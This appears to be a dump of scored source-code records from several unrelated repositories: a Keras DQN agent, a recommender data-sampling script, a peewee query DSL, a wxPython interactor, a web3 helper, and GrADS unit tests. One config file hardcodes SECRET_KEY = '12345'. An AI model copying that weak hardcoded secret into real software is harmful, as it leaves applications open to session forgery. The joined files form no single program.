branchB_2 = layers.Conv2D(128, (3, 3), activation = 'relu')(inputB_2) #Convolutional Hidden Layer
branchB_2 = layers.MaxPooling2D(pool_size=(2, 2))(branchB_2)
branchB_2 = layers.Dropout(0.2)(branchB_2)
branchB_2 = layers.Flatten()(branchB_2)
modelB_2 = models.Model(inputs=inputB_2, outputs=branchB_2)
#-------- InputB_3 --------
#branchB_3 = layers.Conv2D(64, (3, 3), activation = 'relu')(inputB_3) #Convolutional Hidden Layer
#branchB_3 = layers.MaxPooling2D(pool_size=(2, 2))(branchB_3)
#branchB_3 = layers.Dropout(0.2)(branchB_3)
branchB_3 = layers.Conv2D(128, (3, 3), activation = 'relu')(inputB_3) #Convolutional Hidden Layer
branchB_3 = layers.MaxPooling2D(pool_size=(2, 2))(branchB_3)
branchB_3 = layers.Dropout(0.2)(branchB_3)
branchB_3 = layers.Flatten()(branchB_3)
modelB_3 = models.Model(inputs=inputB_3, outputs=branchB_3)
#------- Combine -------
branchC = layers.concatenate([inputA, modelB_1.output, modelB_2.output, modelB_3.output])
branchC = layers.Dense(256, activation='relu')(branchC)
branchC = layers.Dense(256, activation='relu')(branchC)
output = layers.Dense(len(feasible_actions), activation='linear')(branchC) #Output layer
model = models.Model(inputs=[inputA, modelB_1.input, modelB_2.input, modelB_3.input], outputs = output)
opt = optimizers.Adam(learning_rate=1e-3)
model.compile(loss="mse",
optimizer=opt,
metrics=['accuracy'])
#tensorflow.keras.utils.plot_model(model, "multi_input_and_output_model.png", show_shapes=True)
return model
def _custom_loss_function(self, score_true, score_expected):
custom_loss = []
for index, _ in enumerate(score_true):
custom_loss += [math.sqrt((score_true[index]-score_expected[index])**2)]
return np.asarray([custom_loss])
def _update_replay_memory(self, transition):
GroupDRL._replay_memory.append(transition)
def _get_qs(self, state, step): #Probably not gonna be used
current_state = self._game_to_model_state(state)
prediction = GroupDRL._main_model.predict(current_state)[0]
return prediction
def _train(self, terminal_state, step):
if len(GroupDRL._replay_memory) < (MIN_REPLAY_MEMORY_SIZE*GroupDRL._global_instances) or GroupDRL._global_training_count % (GroupDRL._global_instances*1000) % 1000 != 0:
return
minibatch = random.sample(GroupDRL._replay_memory, MINIBATCH_SIZE*GroupDRL._global_instances)
current_state = self._get_current_state(minibatch)
current_qs_list = GroupDRL._main_model.predict(current_state)
future_state = self._get_future_state(minibatch)
future_qs_list = GroupDRL._current_model.predict(future_state)
X_info = []
X_l1 = []
X_l2 = []
X_l3 = []
y = []
for index, (current_state, action, reward, new_current_state, done, life_changer) in enumerate(minibatch):
if done:
new_q = -10 #reward
elif life_changer:
new_q = reward
else:
max_future_q = np.max(future_qs_list[index])
                new_q = reward + DISCOUNT * max_future_q #The discount down-weights the estimated future return relative to the immediate reward
current_qs = current_qs_list[index]
current_qs[action] = new_q
self._append_to_input_output_matrices(X_info, X_l1, X_l2, X_l3, y, current_state, current_qs)
X_info_np = self._transform_info_to_np_structure(X_info)
X_l1_np = self._transform_X_to_np_structure(X_l1)
X_l2_np = self._transform_X_to_np_structure(X_l2)
X_l3_np = self._transform_X_to_np_structure(X_l3)
        history = GroupDRL._main_model.fit([X_info_np, X_l1_np, X_l2_np, X_l3_np], np.array(y), batch_size = MINIBATCH_SIZE, verbose = 0, shuffle=False, callbacks=[CustomCallback()] if terminal_state or step%10 == 1 else None) #Only attach the callback on terminal states (or every 10th step)
#Updating to determine if we want to update target_model yet
if terminal_state:
GroupDRL._global_target_update_count += 1
if GroupDRL._global_target_update_count > UPDATE_TARGET_EVERY:
GroupDRL._global_target_update_count = 0
GroupDRL._current_model.set_weights(GroupDRL._main_model.get_weights())
def _append_to_input_output_matrices(self, X0, X1, X2, X3, y, state, qs):
X0 += [state[0]] #Previous state
X1 += [state[1]]
X2 += [state[2]]
X3 += [state[3]]
        y += [qs] #The Q-values this state should have led to
def _transform_info_to_np_structure(self, X_info):
X_info_np = np.array(X_info)
X_info_np = X_info_np.reshape(X_info_np.shape[0], X_info_np.shape[2])
return X_info_np
def _transform_X_to_np_structure(self, X):
X_np = np.array(X)
X_np = X_np.reshape(X_np.shape[0], X_np.shape[2], X_np.shape[3], X_np.shape[4])
return X_np
def _get_current_state(self, minibatch):
current_states_0 = np.array([transition[0][0] for transition in minibatch])
current_states_0 = current_states_0.reshape(current_states_0.shape[0], current_states_0.shape[2])
current_states_1 = np.array([transition[0][1] for transition in minibatch])
current_states_1 = current_states_1.reshape(current_states_1.shape[0], current_states_1.shape[2], current_states_1.shape[3], current_states_1.shape[4])
current_states_2 = np.array([transition[0][2] for transition in minibatch])
current_states_2 = current_states_2.reshape(current_states_2.shape[0], current_states_2.shape[2], current_states_2.shape[3], current_states_2.shape[4])
current_states_3 = np.array([transition[0][3] for transition in minibatch])
current_states_3 = current_states_3.reshape(current_states_3.shape[0], current_states_3.shape[2], current_states_3.shape[3], current_states_3.shape[4])
return [current_states_0, current_states_1, current_states_2, current_states_3]
def _get_future_state(self, minibatch):
new_current_state_0 = np.array([transition[3][0] for transition in minibatch])
new_current_state_0 = new_current_state_0.reshape(new_current_state_0.shape[0], new_current_state_0.shape[2])
new_current_state_1 = np.array([transition[3][1] for transition in minibatch])
new_current_state_1 = new_current_state_1.reshape(new_current_state_1.shape[0], new_current_state_1.shape[2], new_current_state_1.shape[3], new_current_state_1.shape[4])
new_current_state_2 = np.array([transition[3][2] for transition in minibatch])
new_current_state_2 = new_current_state_2.reshape(new_current_state_2.shape[0], new_current_state_2.shape[2], new_current_state_2.shape[3], new_current_state_2.shape[4])
new_current_state_3 = np.array([transition[3][3] for transition in minibatch])
new_current_state_3 = new_current_state_3.reshape(new_current_state_3.shape[0], new_current_state_3.shape[2], new_current_state_3.shape[3], new_current_state_3.shape[4])
return [new_current_state_0, new_current_state_1, new_current_state_2, new_current_state_3]
def action(self, game_state, train_flag = True):
self._turn_count += 1
GroupDRL._global_training_count += 1
model_state = self._game_to_model_state(game_state)
if train_flag:
            score = self._calculate_score(game_state[0], game_state[2], game_state[3]) - self._previous_score #Reward - use the reward difference, not the absolute score
self._previous_score = self._calculate_score(game_state[0], game_state[2], game_state[3])
if GroupDRL._epsilon > self._episode_epsilon and GroupDRL._epsilon != 0:
if self._turn_count % 100 == 0:
print(f"Train: {train_flag}, steps: {self._turn_count}, life: {game_state[1]}, points: {game_state[2]}, score: {self._previous_score}, Name: {self._model_addr}")
if self._turn_count % 500 == 0:
GroupDRL._epsilon *= self._epsilon_decay
print(f"Epsilon: {GroupDRL._epsilon}, Name: {self._model_addr}")
if isinstance(self._previous_state, list):
terminal_state = game_state[0] == 0 or model_state[0][0][0] != self._previous_state[0][0][0] or model_state[0][0][1] != self._previous_state[0][0][1] #If dead, different health, or different points
                self._update_replay_memory((self._previous_state, self._previous_action, score, model_state, game_state[0] == 0, terminal_state)) #Previous state, action taken, reward received, the new state it led to, whether the run ended, and whether the step was terminal (death or health/points change)
self._train(terminal_state , game_state[0])
else:
if self._turn_count % 100 == 0:
print(f"Train: {train_flag}, steps: {self._turn_count}, life: {game_state[1]}, points: {game_state[2]}, score: {self._previous_score}, Name: {self._model_addr}")
elif not self._turn_count % 100:
print(f"Train: {train_flag}, steps: {self._turn_count}, life: {game_state[1]}, points: {game_state[2]}, score: {self._previous_score}, Name: {self._model_addr}")
action = self._calculate_action(model_state, 0 if not train_flag or GroupDRL._epsilon < self._episode_epsilon else GroupDRL._epsilon)
return action
def _calculate_action(self, current_state, epsilon):
prediction = GroupDRL._main_model.predict(current_state)
action_index = self._choose_action_from_prediction(prediction, epsilon)
self._previous_state = current_state
self._previous_prediction = prediction
self._previous_action = action_index
return self._feasible_actions[action_index]
def _game_to_model_state(self, game_state):
steps = game_state[0] #Should this be normalized?
life = game_state[1]/100 #Normalize
points = game_state[2] #Should this be normalized?
player_coor = (game_state[3][0]/len(game_state[-1][0]), game_state[3][1]/len(game_state[-1])) #Normalize
model_state_attr = [life, player_coor[0], player_coor[1]]
image_shape = (len(game_state[-1]), len(game_state[-1][0]), len(game_state[-1][0][0][0]))
np_model_state_attr = np.array(model_state_attr).reshape(-1, len(model_state_attr))
np_map = np.array(game_state[-1])
np_model_state_map = np.array([ np_map[:,:,0].reshape(-1, *image_shape)/255,
np_map[:,:,1].reshape(-1, *image_shape)/255,
np_map[:,:,2].reshape(-1, *image_shape)/255 ])
return [np_model_state_attr, np_model_state_map[0], np_model_state_map[1], np_model_state_map[2]]
def _choose_action_from_prediction(self, prediction, epsilon):
prediction = prediction[0]
#Choose the highest score
index = np.argmax(prediction)
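        # Epsilon-greedy exploration: with probability epsilon, replace the greedy choice with a random action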
if np.random.random() < epsilon:
index = np.random.randint(0, len(prediction))
return index | 2.203125 | 2 |
benchmark/config.py | babylonhealth/multiverse | 12 | 12786523 |
MULTIVERSE_NUM_CORES_TO_USE = 1
| 1.023438 | 1 |
preprocess.py | noveens/sampling_cf | 6 | 12786524 | from initial_data_prep_code import movielens, amazon, goodreads, beeradvocate
from data_path_constants import get_data_path
from svp_handler import SVPHandler
percent_sample = [ 20, 40, 60, 80, 90, 99 ]
# Which datasets to prep?
for dataset in [
'magazine',
'ml-100k',
## Did not download & preprocess the following in
## the included code, but feel free to download and uncomment
# 'luxury',
# 'video_games',
# 'beeradvocate',
# 'goodreads_comics',
]:
print("\n\n\n!!!!!!!! STARTED PROCESSING {} !!!!!!!!\n\n\n".format(dataset))
if dataset in [ 'ml-100k' ]: total_data = movielens.prep(dataset)
elif dataset in [ 'luxury', 'magazine', 'video_games' ]: total_data = amazon.prep(dataset)
elif dataset in [ 'goodreads_comics' ]: total_data = goodreads.prep(dataset)
elif dataset in [ 'beeradvocate' ]: total_data = beeradvocate.prep(dataset)
# Store original data
total_data.save_data(get_data_path(dataset))
# Sampling
for train_test_split in [ '20_percent_hist', 'leave_2' ]:
total_data.complete_data_stats = None # Since task changed
path_uptil_now = get_data_path(dataset) + "/" + train_test_split + "/"
# Make full-data (No sampling)
total_data.train_test_split(train_test_split)
print("\n{} split, Overall:".format(train_test_split))
total_data.save_index(path_uptil_now + "/complete_data/")
# Frequency sample from user hist (Stratified)
print("\n{} split, user history random sampling".format(train_test_split))
for percent in percent_sample:
total_data.load_index(path_uptil_now + "/complete_data/") # Re-load index map
total_data.frequency_sample(percent, 0)
total_data.save_index(path_uptil_now + str(percent) + "_perc_freq_user_rns")
# Sample users randomly
print("\n{} split, user random sampling".format(train_test_split))
for percent in percent_sample:
total_data.load_index(path_uptil_now + "/complete_data/") # Re-load index map
total_data.user_random_sample(percent)
total_data.save_index(path_uptil_now + str(percent) + "_perc_user_rns")
# Sample interactions randomly
print("\n{} split, interaction random sampling".format(train_test_split))
for percent in percent_sample:
total_data.load_index(path_uptil_now + "/complete_data/") # Re-load index map
total_data.interaction_random_sample(percent)
total_data.save_index(path_uptil_now + str(percent) + "_perc_interaction_rns")
# Temporal sampling
print("\n{} split, user history temporal sampling".format(train_test_split))
for percent in percent_sample:
total_data.load_index(path_uptil_now + "/complete_data/") # Re-load index map
total_data.temporal_sample(percent)
total_data.save_index(path_uptil_now + str(percent) + "_perc_temporal")
# Remove tail users sampling
print("\n{} split, tail user sampling".format(train_test_split))
for percent in percent_sample:
total_data.load_index(path_uptil_now + "/complete_data/") # Re-load index map
total_data.tail_user_remove(percent)
total_data.save_index(path_uptil_now + str(percent) + "_perc_tail_user_remove")
# Pagerank based sampling
print("\n{} split, pagerank sampling".format(train_test_split))
for percent in percent_sample:
total_data.load_index(path_uptil_now + "/complete_data/") # Re-load index map
total_data.pagerank_sample(percent)
total_data.save_index(path_uptil_now + str(percent) + "_perc_pagerank")
# RW based sampling
print("\n{} split, random walk sampling".format(train_test_split))
for percent in percent_sample:
total_data.load_index(path_uptil_now + "/complete_data/") # Re-load index map
total_data.random_walk_sample(percent)
total_data.save_index(path_uptil_now + str(percent) + "_perc_random_walk")
# Forest-fire based sampling
print("\n{} split, forest fire sampling".format(train_test_split))
for percent in percent_sample:
total_data.load_index(path_uptil_now + "/complete_data/") # Re-load index map
total_data.forest_fire_sample(percent)
total_data.save_index(path_uptil_now + str(percent) + "_perc_forest_fire")
# Sample interactions according to SVP
hyper_params = {}
hyper_params['dataset'] = dataset
hyper_params['sampling'] = 'complete_data' # While training the proxy model
for proxy_model in [ 'bias_only', 'MF_dot' ]:
scenarios = [ 'sequential' ] if train_test_split == 'leave_2' else [ 'implicit', 'explicit' ]
for loss_type in scenarios:
print() ; svp_handler = SVPHandler(proxy_model, loss_type, hyper_params)
for sampling in [
'forgetting_events',
'forgetting_events_propensity',
'forgetting_events_user',
'forgetting_events_user_propensity',
]:
print("\n{} split, SVP: {}_{}, {} loss".format(train_test_split, proxy_model, sampling, loss_type))
for percent in percent_sample:
total_data.load_index(path_uptil_now + "/complete_data/") # Re-load index map
total_data.svp_sample(percent, svp_handler, sampling)
total_data.save_index(path_uptil_now + "svp_{}_{}/{}_perc_{}".format(proxy_model, loss_type, percent, sampling))
| 2.484375 | 2 |
playhouse/sweepea.py | mikiec84/peewee | 1 | 12786525 | <reponame>mikiec84/peewee
"""
Querying using an "ISBL"-like syntax, inspired by
https://github.com/akrito/horrorm
http://www.reddit.com/r/programming/comments/2wycq/given_that_ruby_fans_like_the_idea_of_dsls_its/c2x1t2
Example ISBL:
(t1 * t2) : c1 = v1, c2 = v2 % projection
Swee'pea:
(t1 * t2) ** (c1 == v1, c2 == v2) % (t1.f1, t1.f2, t2.f1)
"""
from peewee import *
from peewee import BaseModel
_Model = Model
class T(object):
def __init__(self, *models):
self.models = list(models)
self.query = None
self.projection = None
self.ordering = None
def __mul__(self, rhs):
if isinstance(rhs, T):
self.models.extend(rhs.models)
else:
self.models.append(rhs)
return self
def __pow__(self, rhs):
self.query = rhs
return self
def __mod__(self, rhs):
if not isinstance(rhs, (list, tuple)):
rhs = [rhs]
self.projection = rhs
return self
def __lshift__(self, rhs):
self.ordering = rhs
return self
def q(self):
if self.projection:
select = {}
for field in self.projection:
select.setdefault(field.model, [])
select[field.model].append(field.name)
else:
select = dict((m, ['*']) for m in self.models)
sq = self.models[0].select(select)
if self.ordering:
sq = sq.order_by(self.ordering)
for model in self.models[1:]:
sq = sq.join(model)
if self.query:
sq = sq.where(self.query)
return sq.naive()
def __iter__(self):
return iter(self.q())
class ISBLBaseModel(BaseModel):
def __mul__(cls, rhs):
return T(cls) * rhs
def __pow__(cls, rhs):
return T(cls) ** rhs
def __mod__(cls, rhs):
return T(cls) % rhs
def __lshift__(cls, rhs):
return T(cls) << rhs
class Model(_Model):
__metaclass__ = ISBLBaseModel
| 2.84375 | 3 |
clusteris/main/interactor.py | iturricf/clusteris | 0 | 12786526 | # -*- coding: utf-8 -*-
import wx
class Interactor(object):
"""Connects the UI events with the Presenter class."""
def Connect(self, presenter, view):
"""Listens to UI evens and asigns an event handler on the Presenter."""
self.presenter = presenter
self.view = view
        # File menu
view.Bind(wx.EVT_MENU, self.OnOpenDatasetClicked, view.mItemDataset)
view.Bind(wx.EVT_MENU, self.OnExportImageClicked, view.mItemExportImage)
view.Bind(wx.EVT_MENU, self.OnExportCsvClicked, view.mItemExportCsv)
view.Bind(wx.EVT_MENU, self.OnExitClicked, view.mItemExit)
        # Process menu
view.Bind(wx.EVT_MENU, self.OnProcessDataset, view.mItemProcess)
view.Bind(wx.EVT_MENU, self.OnPlotResults, view.mItemPlot)
view.Bind(wx.EVT_CLOSE, self.OnExitClicked)
        # Help menu
view.Bind(wx.EVT_MENU, self.OnHelpGetHelp, view.mItemHelp)
view.Bind(wx.EVT_MENU, self.OnHelpAbout, view.mItemAbout)
view.Bind(view.EVT_FILE_SELECTED, self.OnFileSelected)
view.Bind(view.EVT_EXPORT_CSV_FILE_SELECTED, self.OnExportCsvFileSelected)
view.Bind(view.EVT_EXPORT_PNG_FILE_SELECTED, self.OnExportPngFileSelected)
def OnOpenDatasetClicked(self, evt):
self.presenter.ShowFileDialog()
def OnExportImageClicked(self, evt):
self.presenter.ShowExportImageDialog()
def OnExportPngFileSelected(self, evt):
self.presenter.ExportPngFile(evt.path)
def OnExportCsvClicked(self, evt):
self.presenter.ShowExportCsvDialog()
def OnExportCsvFileSelected(self, evt):
self.presenter.ExportCsvFile(evt.path)
def OnFileSelected(self, evt):
self.presenter.SetSelectedFile(evt.path)
def OnProcessDataset(self, evt):
self.presenter.ShowDatasetConfigDialog()
# self.presenter.Process()
def OnHelpGetHelp(self, evt):
wx.BeginBusyCursor()
import webbrowser
webbrowser.open("https://github.com/iturricf/clusteris/wiki/How-to-use-Clusteris")
wx.EndBusyCursor()
def OnHelpAbout(self, evt):
box = wx.MessageDialog(None, 'ClusteRIS v1.0 \nAplicación desarrollada para lograr el agrupamiento de datos mediante la técnica de algoritmos genéticos. \n\n Autores: <NAME>, <NAME> y <NAME>.', 'Acerca de CluteRIS', wx.OK)
box.ShowModal()
def OnPlotResults(self, evt):
self.presenter.ShowPlotConfigDialog()
# self.presenter.Plot()
def OnExitClicked(self, evt):
self.presenter.Close()
| 2.421875 | 2 |
app/instance/config.py | Rickyngotho/pitch | 0 | 12786527 | SECRET_KEY = '12345' | 0.957031 | 1 |
web3/utils/functional.py | bellaj/web3py | 0 | 12786528 | <reponame>bellaj/web3py<gh_stars>0
import functools
from eth_utils import (
compose,
)
def apply_formatters_to_return(*formatters):
formatter = compose(*formatters)
def outer(fn):
@functools.wraps(fn)
def inner(*args, **kwargs):
value = fn(*args, **kwargs)
return formatter(value)
return inner
return outer
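# Usage sketch (hypothetical formatter/function names): the decorated function's
# return value is passed through the composed formatters, e.g.
#
#   @apply_formatters_to_return(hex_to_integer)
#   def get_block_number():
#       return "0x10"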
| 2.4375 | 2 |
test/test_delete_group.py | NikolayLukyanov/python_pfqa | 0 | 12786529 | <reponame>NikolayLukyanov/python_pfqa
from model.group import Group
import random
def test_delete_random_group(app, db, check_ui):
if len(db.get_group_list()) == 0:
app.group.create(Group(group_name="zaglushka"))
oldgroups = db.get_group_list()
group = random.choice(oldgroups)
app.group.delete_by_id(group.id)
newgroups = db.get_group_list()
    # check that the old group list without the deleted element equals the group list fetched after deleting the random group
oldgroups.remove(group)
assert oldgroups == newgroups
if check_ui:
assert sorted(db.get_stripped_group_list(), key=Group.id_or_max) == sorted(app.group.get_group_list(), key=Group.id_or_max) | 2.96875 | 3 |
wgrib2-v0.1.9.4/pytests/TestModelFile.py | jprules321/colas | 0 | 12786530 | """
Test Basic GrADS Operations on the standard "model" test file.
"""
# Add parent directory to python search path
# ------------------------------------------
import os
import sys
sys.path.insert(0,'..')
sys.path.insert(0,'lib')
import unittest
from grads import GrADS
class TestModelFile(unittest.TestCase):
def tearDown(self):
del self.ga
# os.system("/bin/rm -rf output")
def test_01_Open(self):
"""
Check whether file was opened correctly.
"""
type = 'Gridded'
vars = ['ps', 'ts', 'pr', 'ua', 'va', 'zg', 'ta', 'hus']
var_levs = [0, 0, 0, 7, 7, 7, 7, 7]
nx, ny, nz, nt = (72, 46, 7, 5)
fh = self.fh
self.assertEqual(type,fh.type)
self.assertEqual(nx,fh.nx)
self.assertEqual(ny,fh.ny)
self.assertEqual(nz,fh.nz)
self.assertEqual(nt,fh.nt)
vars2 = fh.vars[:]
var_levs2 = fh.var_levs[:]
self.assertEqual(vars.sort(),vars2.sort())
self.assertEqual(var_levs.sort(),var_levs2.sort())
def test_02_Execs(self):
"""
Exercises the exec command using both Unix and DOS text files.
"""
self.ga("exec Exec.ga")
self.ga("exec Exec_dos.ga")
def test_02_Prints(self):
"""
        Exercises print/print file.eps/printim but does not verify results.
This is not really a test as it does not check the outcome.
"""
self.ga("display ps")
self.ga("print output/ps.eps")
self.ga("enable print output/ps.gx")
self.ga("print output/ps.eps")
self.ga("disable print")
def test_02_Printim(self):
"""
Exercises printim - not really a test as it does not check outcome.
"""
self.ga("q config")
cf = self.ga.rline(1)
if 'printim' in cf:
self.ga("printim output/ps.png")
def test_03_Display(self):
"""
Displays several variables and checks contour intervals
"""
self._CheckCint('ps',500,1000,50,z=1,t=1)
self._CheckCint('ts',240,310,10,z=1,t=1)
self._CheckCint('10000*pr',0,8,1,z=1,t=1)
self._CheckCint('ps',500,1000,50,z=1,t=5)
self._CheckCint('ts',240,310,10,z=1,t=5)
self._CheckCint('10000*pr',0,10,1,z=1,t=5)
self._CheckCint('ua',-12,18,3,z=1,t=1)
self._CheckCint('va',-15,15,3,z=1,t=1)
self._CheckCint('zg',-100,300,50,z=1,t=1)
self._CheckCint('ta',245,300,5,z=1,t=1)
self._CheckCint('1000*hus',2,20,2,z=1,t=5)
self._CheckCint('ua',-15,50,5,z=7,t=5)
self._CheckCint('va',-20,20,5,z=7,t=5)
self._CheckCint('zg',14800,16400,200,z=7,t=5)
self._CheckCint('ta',195,225,5,z=7,t=5)
self._CheckCint('10000*hus',1,9,1,z=5,t=5)
def test_04_Write_generic(self):
self.ga("set x 1 72")
self.ga("lats4d -o output/sequential -format sequential -vars ps ta -func sqrt(@) -time = = 2 ")
def test_04_Write_stream(self):
self.ga("set x 1 72")
self.ga("lats4d -o output/stream -be -format stream")
def test_05_Read_stream(self):
fh = self.ga.open("stream.ctl")
self._CompareFiles(self.fh,fh)
self.ga('close %d'%fh.fid)
def test_04_Write_sequential(self):
self.ga("set x 1 72")
self.ga("lats4d -o output/sequential -le -format sequential")
def test_05_Read_sequential(self):
fh = self.ga.open("sequential.ctl")
self._CompareFiles(self.fh,fh)
self.ga('close %d'%fh.fid)
def test_04_stats(self):
self.ga("set x 1 72")
self.ga("lats4d -format stats")
def test_04_Write_mean(self):
self.ga("set x 1 72")
self.ga("lats4d -o output/mean -format stream -mean")
def xtest_06_regriding_linear(self):
self._CheckCint2("re(ts,2,2,bl)",240,310,10)
self._CheckCint2("re(ts,2,1,bl)",240,310,10)
def xtest_06_regriding_bessel(self):
self._CheckCint2("re(ts,2,2,bs)",240,310,10)
self._CheckCint2("re(ts,2,1,bs)",240,310,10)
def xtest_06_regriding_box_average(self):
self._CheckCint2("re(ts,2,2,ba)",240,310,10)
self._CheckCint2("re(ts,2,1,ba)",240,310,10)
def xtest_06_regriding_box_voting(self):
self._CheckCint2("1e4*re(pr,8,8,vt,0.6,0.2)",0,8,1)
def _CheckCint(self,name,cmin,cmax,cint,z=1,t=1):
"""
Check contour intervals during display.
"""
self.ga('clear')
self.ga('display %s(z=%d,t=%d)'%(name,z,t))
self.assertEqual(cmin,int(self.ga.rword(1,2)))
self.assertEqual(cmax,int(self.ga.rword(1,4)))
self.assertEqual(cint,int(self.ga.rword(1,6)))
def _CheckCint2(self,name,cmin,cmax,cint):
"""
Check contour intervals during display.
"""
self.ga.cmd('clear')
self.ga.cmd('display %s'%name)
self.assertEqual(cmin,int(self.ga.rword(1,2)))
self.assertEqual(cmax,int(self.ga.rword(1,4)))
self.assertEqual(cint,int(self.ga.rword(1,6)))
def _CompareFiles(self,fh1,fh2):
vars1 = fh1.vars[:]
vars2 = fh2.vars[:]
self.assertEqual(vars1.sort(),vars2.sort())
self.assertEqual(fh1.nt,fh2.nt)
for i in range(len(fh1.vars)):
var = fh1.vars[i]
nz = fh1.var_levs[i]
if nz==0: nz=1
if var=='hus': nz=5
nt = fh1.nt
for t in range(1,nt+1):
for z in range(1,nz+1):
self.ga('clear')
self.ga('display %s.%d(z=%d,t=%d) - %s.%d(z=%d,t=%d)'\
%(var,fh1.fid,z,t,var,fh2.fid,z,t))
# print ">>> t=%d, z=%d, %s --- %s "%(t,z,var,self.ga.rline(1))
self.assertEqual(self.ga.rline(1), \
'Constant field. Value = 0')
def _GenericSetUp(self,bin,dat):
global GrADSTestFiles
global GrADSBinaryFiles
self.ga = GrADS(Bin=GrADSBinaryFiles[bin], Echo=False, Window=False)
self.fh = self.ga.open(GrADSTestFiles[dat])
def notest_04_LATS_Coards_1(self):
self.ga("set x 1 72")
self.ga("lats4d -o output/model ")
def notest_04_LATS_Coards_2(self):
fh = self.ga.open("output/model.nc")
self._CompareFiles(self.fh,fh)
self.ga('close %d'%fh.fid)
def notest_04_LATS_GaGrib_1(self):
self.ga("set x 1 72")
self.ga("lats4d -o output/model -format grads_grib")
def notest_04_LATS_GaGrib_2(self):
fh = self.ga.open("output/model.ctl")
self._CompareFiles(self.fh,fh)
self.ga('close %d'%fh.fid)
def notest_04_LATS_grib(self):
self.ga("set x 1 72")
self.ga("lats4d -o output/model -format grib")
#......................................................................
class TestModelUrl(unittest.TestCase):
def tearDown(self):
del self.ga
# os.system("/bin/rm -rf output")
def test_01_Open(self):
"""
Check whether file was opened correctly.
"""
type = 'Gridded'
vars = ['ps', 'ts', 'pr', 'ua', 'va', 'zg', 'ta', 'hus']
var_levs = [0, 0, 0, 7, 7, 7, 7, 7]
nx, ny, nz, nt = (72, 46, 7, 5)
fh = self.fh
self.assertEqual(type,fh.type)
self.assertEqual(nx,fh.nx)
self.assertEqual(ny,fh.ny)
self.assertEqual(nz,fh.nz)
self.assertEqual(nt,fh.nt)
vars2 = fh.vars[:]
var_levs2 = fh.var_levs[:]
self.assertEqual(vars.sort(),vars2.sort())
self.assertEqual(var_levs.sort(),var_levs2.sort())
def test_03_Display(self):
"""
Displays several variables and checks contour intervals
"""
self._CheckCint('ps',500,1000,50,z=1,t=1)
self._CheckCint('ts',240,310,10,z=1,t=1)
self._CheckCint('10000*pr',0,8,1,z=1,t=1)
self._CheckCint('ps',500,1000,50,z=1,t=5)
self._CheckCint('ts',240,310,10,z=1,t=5)
self._CheckCint('10000*pr',0,10,1,z=1,t=5)
self._CheckCint('ua',-12,18,3,z=1,t=1)
self._CheckCint('va',-15,15,3,z=1,t=1)
self._CheckCint('zg',-100,300,50,z=1,t=1)
self._CheckCint('ta',245,300,5,z=1,t=1)
self._CheckCint('1000*hus',2,20,2,z=1,t=5)
self._CheckCint('ua',-15,50,5,z=7,t=5)
self._CheckCint('va',-20,20,5,z=7,t=5)
self._CheckCint('zg',14800,16400,200,z=7,t=5)
self._CheckCint('ta',195,225,5,z=7,t=5)
self._CheckCint('10000*hus',1,9,1,z=5,t=5)
def _CheckCint(self,name,cmin,cmax,cint,z=1,t=1):
"""
Check contour intervals during display.
"""
sys.stdout.write(name+' ... ')
self.ga('clear')
self.ga('display %s(z=%d,t=%d)'%(name,z,t))
self.assertEqual(cmin,int(self.ga.rword(1,2)))
self.assertEqual(cmax,int(self.ga.rword(1,4)))
self.assertEqual(cint,int(self.ga.rword(1,6)))
def _GenericSetUp(self,bin,dat):
global GrADSTestFiles
global GrADSBinaryFiles
self.ga = GrADS(Bin=GrADSBinaryFiles[bin], Echo=False, Window=False)
self.fh = self.ga.open(GrADSTestFiles[dat])
#......................................................................
class TestStnUrl(unittest.TestCase):
def _GenericSetUp(self,bin,url):
self.ga = GrADS(Bin=GrADSBinaryFiles[bin], Echo=False, Window=False)
self.fh = self.ga('open ' + url)
def tearDown(self):
del self.ga
def test_01_Open(self):
ga = self.ga
ga('q file')
Binary = ga.rword(3,2)
Type = ga.rword(4,3) + ' ' + ga.rword(4,4)
Tsize = ga.rword(5,3)
nvars = ga.rword(6,5)
self.assertEqual(Binary,'http://monsoondata.org:9090/dods/stn/metar/2009/02/day05')
self.assertEqual(Type,'Station Data')
self.assertEqual(Tsize,'24')
self.assertEqual(nvars,'10')
vars = ['cld','ds','filt','ptype','slp','ts','us','vis','vs','wx']
for i in range(10):
self.assertEqual(vars[i],ga.rword(7+i,1))
def test_01_Stats(self):
ga = self.ga
ga('set gxout stat')
# var count undef nu min max cmin cmax cint
# self._stats( 'cld','2842','-9.99e+08', '0', '20','25','20','25','0.5')
# self._stats( 'ds', '2842','-9.99e+08','133','-49','27','-40','20','10')
# self._stats( 'filt', '2842','-9.99e+08','0','0','6','0','6','0.5')
self._stats( 'slp', '2842','-9.99e+08','1496','982.5','1046.5','985','1045','5')
self._stats( 'ts', '2842','-9.99e+08','16','-44','99','-40','90','10')
self._stats( 'us', '2842','-9.99e+08','4','-31','31.0098','-30','30','5')
self._stats( 'vs', '2842','-9.99e+08','4','-24.2488','28','-20','25','5')
def _stats(self,var,count,v_undef,n_undef,min,max,cmin,cmax,cint):
ga = self.ga
ga('set gxout stat')
ga('display '+var)
sys.stdout.write(var+' ... ')
self.assertEqual(count,ga.rword(6,4))
self.assertEqual(v_undef,ga.rword(7,4))
self.assertEqual(n_undef,ga.rword(8,4))
# self.assertEqual(min,ga.rword(9,4))
# self.assertEqual(max,ga.rword(9,5))
self.assertEqual(cmin,ga.rword(10,5))
self.assertEqual(cmax,ga.rword(10,6))
self.assertEqual(cint,ga.rword(10,7))
#......................................................................
class TestPdefFile(unittest.TestCase):
def tearDown(self):
del self.ga
def test_01_Open(self):
"""
Check whether file was opened correctly.
"""
type = 'Gridded'
vars = ['pslv']
var_levs = [ 0 ]
nx, ny, nz, nt = (333,182,20,1)
fh = self.fh
self.assertEqual(type,fh.type)
self.assertEqual(nx,fh.nx)
self.assertEqual(ny,fh.ny)
self.assertEqual(nz,fh.nz)
self.assertEqual(nt,fh.nt)
vars2 = fh.vars[:]
var_levs2 = fh.var_levs[:]
self.assertEqual(vars.sort(),vars2.sort())
self.assertEqual(var_levs.sort(),var_levs2.sort())
def test_03_Display(self):
"""
Displays several variables and checks contour intervals
"""
self._CheckCint('pslv',1004,1026,2,z=1,t=1)
def _CheckCint(self,name,cmin,cmax,cint,z=1,t=1):
"""
Check contour intervals during display.
"""
self.ga('clear')
self.ga('display %s(z=%d,t=%d)'%(name,z,t))
self.assertEqual(cmin,int(self.ga.rword(2,2)))
self.assertEqual(cmax,int(self.ga.rword(2,4)))
self.assertEqual(cint,int(self.ga.rword(2,6)))
def _GenericSetUp(self,bin):
global GrADSTestFiles
global GrADSBinaryFiles
self.ga = GrADS(Bin=GrADSBinaryFiles[bin], Echo=False, Window=False)
self.fh = self.ga.open(GrADSTestFiles['pdef'])
